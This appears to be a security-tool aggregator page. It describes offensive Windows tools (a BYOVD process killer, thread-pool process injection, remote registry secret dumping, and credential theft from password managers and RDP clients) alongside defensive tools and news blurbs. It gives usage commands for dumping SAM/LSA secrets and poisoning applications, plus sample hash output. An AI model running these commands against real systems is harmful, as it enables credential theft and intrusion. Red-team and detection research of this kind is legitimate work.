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Reaper - Proof Of Concept On BYOVD Attack

By: Zion3R — June 1st 2024 at 12:30

Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.

Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version, taking advantage of its weaknesses to gain privileged access and control over the target system.

Note: Reaper does not kill the Windows Defender process, as it has a protection, Reaper is a simple proof of concept.


  • Kill process
  • Suspend process


/ __ \___ ____ _____ ___ _____
/ /_/ / _ \/ __ `/ __ \/ _ \/ ___/
/ _, _/ __/ /_/ / /_/ / __/ /
/_/ |_|\___/\__,_/ .___/\___/_/

[Coded by MrEmpy]

Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
sp, suspend process
kp, kill process

PROCESSID process id to suspend/kill

Reaper.exe sp 1337
Reaper.exe kp 1337



You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

Note: The executable and driver must be in the same directory.

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PoolParty - A Set Of Fully-Undetectable Process Injection Techniques Abusing Windows Thread Pools

By: Zion3R — May 24th 2024 at 12:30

A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title - injection-techniques-using-windows-thread-pools-35446">The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools

PoolParty Variants

Variant ID Varient Description
1 Overwrite the start routine of the target worker factory
2 Insert TP_WORK work item to the target process's thread pool
3 Insert TP_WAIT work item to the target process's thread pool
4 Insert TP_IO work item to the target process's thread pool
5 Insert TP_ALPC work item to the target process's thread pool
6 Insert TP_JOB work item to the target process's thread pool
7 Insert TP_DIRECT work item to the target process's thread pool
8 Insert TP_TIMER work item to the target process's thread pool


PoolParty.exe -V <VARIANT ID> -P <TARGET PID>

Usage Examples

Insert TP_TIMER work item to process ID 1234

>> PoolParty.exe -V 8 -P 1234

[info] Starting PoolParty attack against process id: 1234
[info] Retrieved handle to the target process: 00000000000000B8
[info] Hijacked worker factory handle from the target process: 0000000000000058
[info] Hijacked timer queue handle from the target process: 0000000000000054
[info] Allocated shellcode memory in the target process: 00000281DBEF0000
[info] Written shellcode to the target process
[info] Retrieved target worker factory basic information
[info] Created TP_TIMER structure associated with the shellcode
[info] Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info] Written the specially crafted TP_TIMER structure to the target process
[info] Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExp iration
[info] PoolParty attack completed successfully

Default Shellcode and Customization

The default shellcode spawns a calculator via the WinExec API.

To customize the executable to execute, change the path in the end of the g_Shellcode variable present in the main.cpp file.

Author - Alon Leviev

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Go-Secdump - Tool To Remotely Dump Secrets From The Windows Registry

By: Zion3R — May 23rd 2024 at 12:30

Package go-secdump is a tool built to remotely extract hashes from the SAM registry hive as well as LSA secrets and cached hashes from the SECURITY hive without any remote agent and without touching disk.

The tool is built on top of the library go-smb and use it to communicate with the Windows Remote Registry to retrieve registry keys directly from memory.

It was built as a learning experience and as a proof of concept that it should be possible to remotely retrieve the NT Hashes from the SAM hive and the LSA secrets as well as domain cached credentials without having to first save the registry hives to disk and then parse them locally.

The main problem to overcome was that the SAM and SECURITY hives are only readable by NT AUTHORITY\SYSTEM. However, I noticed that the local group administrators had the WriteDACL permission on the registry hives and could thus be used to temporarily grant read access to itself to retrieve the secrets and then restore the original permissions.


Much of the code in this project is inspired/taken from Impacket's secdump but converted to access the Windows registry remotely and to only access the required registry keys.

Some of the other sources that have been useful to understanding the registry structure and encryption methods are listed below:


Usage: ./go-secdump [options]

--host <target> Hostname or ip address of remote server
-P, --port <port> SMB Port (default 445)
-d, --domain <domain> Domain name to use for login
-u, --user <username> Username
-p, --pass <pass> Password
-n, --no-pass Disable password prompt and send no credentials
--hash <NT Hash> Hex encoded NT Hash for user password
--local Authenticate as a local user instead of domain user
--dump Saves the SAM and SECURITY hives to disk and
transfers them to the local machine.
--sam Extract secrets from the SAM hive explicitly. Only other explicit targets are included.
--lsa Extract LSA secrets explicitly. Only other explicit targets are included.
--dcc2 Extract DCC2 caches explicitly. Only ohter explicit targets are included.
--backup-dacl Save original DACLs to disk before modification
--restore-dacl Restore DACLs using disk backup. Could be useful if automated restore fails.
--backup-file Filename for DACL backup (default dacl.backup)
--relay Start an SMB listener that will relay incoming
NTLM authentications to the remote server and
use that connection. NOTE that this forces SMB 2.1
without encryption.
--relay-port <port> Listening port for relay (default 445)
--socks-host <target> Establish connection via a SOCKS5 proxy server
--socks-port <port> SOCKS5 proxy port (default 1080)
-t, --timeout Dial timeout in seconds (default 5)
--noenc Disable smb encryption
--smb2 Force smb 2.1
--debug Enable debug logging
--verbose Enable verbose logging
-o, --output Filename for writing results (default is stdout). Will append to file if it exists.
-v, --version Show version

Changing DACLs

go-secdump will automatically try to modify and then restore the DACLs of the required registry keys. However, if something goes wrong during the restoration part such as a network disconnect or other interrupt, the remote registry will be left with the modified DACLs.

Using the --backup-dacl argument it is possible to store a serialized copy of the original DACLs before modification. If a connectivity problem occurs, the DACLs can later be restored from file using the --restore-dacl argument.


Dump all registry secrets

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2

Dump only SAM, LSA, or DCC2 cache secrets

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2

NTLM Relaying

Dump registry secrets using NTLM relaying

Start listener

./go-secdump --host -n --relay

Trigger an auth to your machine from a client with administrative access to somehow and then wait for the dumped secrets.

YYYY/MM/DD HH:MM:SS smb [Notice] Client connected from
YYYY/MM/DD HH:MM:SS smb [Notice] Client ( successfully authenticated as (domain.local\Administrator) against (!
Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0
2023/12/13 14:47:28 [Notice] [+] Signing is NOT required
2023/12/13 14:47:28 [Notice] [+] Login successful as domain.local\Administrator
[*] Dumping local SAM hashes
Name: Administrator
RID: 500
NT: 2727D7906A776A77B34D0430EAACD2C5

Name: Guest
RID: 501
NT: <empty>

Name: DefaultAccount
RID: 503
NT: <empty>

Name: WDAGUtilityAccount
RID: 504
NT: <empty>

[*] Dumping LSA Secrets
$MACHINE.ACC: 0x15deadbeef645e75b38a50a52bdb67b4
$MACHINE.ACC:plain_password_hex:47331e26f48208a7807cafeababe267261f79fdc 38c740b3bdeadbeef7277d696bcafebabea62bb5247ac63be764401adeadbeef4563cafebabe43692deadbeef03f...
dpapi_machinekey: 0x8afa12897d53deadbeefbd82593f6df04de9c100
dpapi_userkey: 0x706e1cdea9a8a58cafebabe4a34e23bc5efa8939
[*] NL$KM
NL$KM: 0x53aa4b3d0deadbeef42f01ef138c6a74
[*] Dumping cached domain credentials (domain/username:hash)


Dump secrets using an upstream SOCKS5 proxy either for pivoting or to take advantage of Impacket's SOCKS server functionality.

When using as the upstream proxy, the provided username must match that of the authenticated client, but the password can be empty.

./ -socks -t -smb2support --no-http-server --no-wcf-server --no-raw-server

./go-secdump --host --user Administrator -n --socks-host --socks-port 1080

☐ ☆ ✇ The Hacker News

Windows 11 to Deprecate NTLM, Add AI-Powered App Controls and Security Defenses

By: Newsroom — May 21st 2024 at 09:02
&nbsp;Microsoft on Monday confirmed its plans to deprecate NT LAN Manager (NTLM) in Windows 11 in the second half of the year, as it announced a slew of new security measures to harden the widely-used desktop operating system. "Deprecating NTLM has been a huge ask from our security community as it will strengthen user authentication, and deprecation is planned in the second half of 2024," the
☐ ☆ ✇ The Hacker News

Grandoreiro Banking Trojan Resurfaces, Targeting Over 1,500 Banks Worldwide

By: Newsroom — May 19th 2024 at 07:59
The threat actors behind the Windows-based&nbsp;Grandoreiro&nbsp;banking trojan have returned in a global campaign since March 2024 following a law enforcement takedown in January. The large-scale phishing attacks, likely facilitated by other cybercriminals via a malware-as-a-service (MaaS) model, target over 1,500 banks across the world, spanning more than 60 countries in Central and South
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Microsoft Patches 61 Flaws, Including Two Actively Exploited Zero-Days

By: Newsroom — May 15th 2024 at 07:17
Microsoft has addressed&nbsp;a total of&nbsp;61 new security flaws&nbsp;in its software as part of its Patch Tuesday updates for May 2024, including two zero-days&nbsp;which&nbsp;have&nbsp;been actively exploited&nbsp;in the wild. Of the 61 flaws, one is rated Critical, 59 are rated Important, and one is rated Moderate in severity.&nbsp;This&nbsp;is in&nbsp;addition to&nbsp;30 vulnerabilities&
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Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

By: Zion3R — May 8th 2024 at 12:30


Presented at CODE BLUE 2023, this project titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis introduces IOCTLance, a tool that enhances its capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknow n ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


Target Vulnerability Types

  • map physical memory
  • controllable process handle
  • buffer overflow
  • null pointer dereference
  • read/write controllable address
  • arbitrary shellcode execution
  • arbitrary wrmsr
  • arbitrary out
  • dangerous file operation

Optional Customizations

  • length limit
  • loop bound
  • total timeout
  • IoControlCode timeout
  • recursion
  • symbolize data section


Docker (Recommand)

docker build .


dpkg --add-architecture i386
apt-get update
apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
libffi-dev libxslt1-dev libxml2-dev

pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9


# python3 analysis/ -h
usage: [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
[-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]

positional arguments:
path dir (including subdirectory) or file path to the driver(s) to analyze

optional arguments:
-h, --help show this help message and exit
analyze specified IoControlCode (e.g. 22201c)
total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
-t TIMEOUT, --timeout TIMEOUT
timeout for analyze each IoControlCode (default 40, 0 to unlimited)
-l LENGTH, --length LENGTH
the limit of number of instructions for technique L engthLimiter (default 0, 0
to unlimited)
-b BOUND, --bound BOUND
the bound for technique LoopSeer (default 0, 0 to unlimited)
-g GLOBAL_VAR, --global_var GLOBAL_VAR
symbolize how many bytes in .data section (default 0 hex)
-a ADDRESS, --address ADDRESS
address of ioctl handler to directly start hunting with blank state (e.g.
-e EXCLUDE, --exclude EXCLUDE
exclude function address split with , (e.g. 140005c20,140006c20)
-o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
-r, --recursion do not kill state if detecting recursion (default False)
-c, --complete get complete base state (default False)
-d, --debug print debug info while analyzing (default False)


# python3 evaluation/ -h
usage: [-h] [-w] path

positional arguments:
path target dir or file path

optional arguments:
-h, --help show this help message and exit
-w, --wdm copy the wdm drivers into <path>/wdm


  1. Compile the testing examples in test to generate testing driver files.
  2. Run IOCTLance against the drvier files.


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Gftrace - A Command Line Windows API Tracing Tool For Golang Binaries

By: Zion3R — May 6th 2024 at 12:30

A command line Windows API tracing tool for Golang binaries.

Note: This tool is a PoC and a work-in-progress prototype so please treat it as such. Feedbacks are always welcome!

How it works?

Although Golang programs contains a lot of nuances regarding the way they are built and their behavior in runtime they still need to interact with the OS layer and that means at some point they do need to call functions from the Windows API.

The Go runtime package contains a function called asmstdcall and this function is a kind of "gateway" used to interact with the Windows API. Since it's expected this function to call the Windows API functions we can assume it needs to have access to information such as the address of the function and it's parameters, and this is where things start to get more interesting.

Asmstdcall receives a single parameter which is pointer to something similar to the following structure:

struct LIBCALL {
DWORD_PTR ReturnValue;


Some of these fields are filled after the API function is called, like the return value, others are received by asmstdcall, like the function address, the number of arguments and the list of arguments. Regardless when those are set it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.

The gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log it to the user. The tool is capable of log the function name, it's parameters and also the return value of each Windows function called by a Golang application. All of it with no need to hook a single API function or have a signature for it.

The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).

If you want to know more about this project and research check the blogpost.


Download the latest release.


  1. Make sure gftrace.exe, gftrace.dll and gftrace.cfg are in the same directory.
  2. Specify which API functions you want to trace in the gftrace.cfg file (the tool does not work without API filters applied).
  3. Run gftrace.exe passing the target Golang program path as a parameter.
gftrace.exe <filepath> <params>


All you need to do is specify which functions you want to trace in the gftrace.cfg file, separating it by comma with no spaces:


The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined either by analysis of the method itself or trying to guess it. There's some interesting characteristics that can be used to determine it, for example, Golang applications seems to always prefer to call functions from the "Wide" and "Ex" set (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc) so you can consider it during your analysis.

The default config file contains multiple functions in which I tested already (at least most part of them) and can say for sure they can be called by a Golang application at some point. I'll try to update it eventually.


Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:

- CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
- CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)

Tracing CreateProcessW() in the TunnelFish malware:

- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress |  ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)


Tracing multiple functions in the Sunshuttle malware:

- CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
- WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
- GetAddrInfoW("", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
- WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
- WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
- GetAddrInfoW("", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
- WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
- WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)


Tracing multiple functions in the DeimosC2 framework agent:

- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
- setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
- socket(0x2, 0x1, 0x6) = 0x138 (312)
- WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
- GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
- GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
- LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
- NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
- GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
- GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
- CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
- GetCurrentProcessId() = 0x2584 (9604)
- GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57 )


Future features:

  • [x] Support inspection of 32 bits files.
  • [x] Add support to files calling functions via the "IAT jmp table" instead of the API call directly in asmstdcall.
  • [x] Add support to cmdline parameters for the target process
  • [ ] Send the tracing log output to a file by default to make it better to filter. Currently there's no separation between the target file and gftrace output. An alternative is redirect gftrace output to a file using the command line.

:warning: Warning

  • The tool inspects the target binary dynamically and it means the file being traced is executed. If you're inspecting a malware or an unknown software please make sure you do it in a controlled environment.
  • Golang programs can be very noisy depending the file and/or function being traced (e.g. VirtualAlloc is always called multiple times by the runtime package, CreateFileW is called multiple times before a call to CreateProcessW, etc). The tool ignores the Golang runtime initialization noise but after that it's up to the user to decide what functions are better to filter in each scenario.


The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.

☐ ☆ ✇ The Hacker News

Google Announces Passkeys Adopted by Over 400 Million Accounts

By: Newsroom — May 3rd 2024 at 06:40
Google on Thursday announced that&nbsp;passkeys are being used by&nbsp;over 400 million Google accounts, authenticating users more than 1 billion times&nbsp;over the past two years. "Passkeys are easy to use and phishing resistant, only relying on a fingerprint, face scan or a pin making them 50% faster than passwords," Heather Adkins, vice president of security engineering at Google,&nbsp;said.
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ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

By: Zion3R — April 30th 2024 at 12:30

ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.

The accompanying blog post can be found here



Rustup must be installed, follow the instructions available here :

The mingw-w64 package must be installed. On Debian, this can be done using :

apt install mingw-w64

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu

Mono and Nuget must also be installed, instructions are available here :

After adding Mono repositories, Nuget can be installed using apt :

apt install nuget

Finally, python dependancies must be installed :

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11.


Rustup must be installed, follow the instructions available here :

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc

.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

Finally, python dependancies must be installed :

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11

NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)


All modules have been tested on the following Windows versions :

Windows Version
Windows Server 2022
Windows Server 2019
Windows Server 2016
Windows Server 2012R2
Windows 10
Windows 11

[!CAUTION] Modules have not been tested on other version, and are expected to not work.

Application Injection Method
KeePass.exe AppDomainManager Injection
KeePassXC.exe DLL Proxying
LogonUI.exe (Windows Login Screen) COM Hijacking
consent.exe (Windows UAC Popup) COM Hijacking
mstsc.exe (Windows default RDP client) COM Hijacking
RDCMan.exe (Sysinternals' RDP client) COM Hijacking
MobaXTerm.exe (3rd party RDP client) COM Hijacking


[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

ThievingFox contains 3 main modules : poison, cleanup and collect.


For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.

To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive).

--keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

[!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

$ python3 client/ poison -h
usage: poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--ke epassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications


For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.

For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless.

Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

It does not clean extracted credentials on the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

$ python3 client/ cleanup -h
usage: cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications


For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

$ python3 client/ collect -h
usage: collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of th e domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications

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CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

By: Zion3R — April 28th 2024 at 12:30

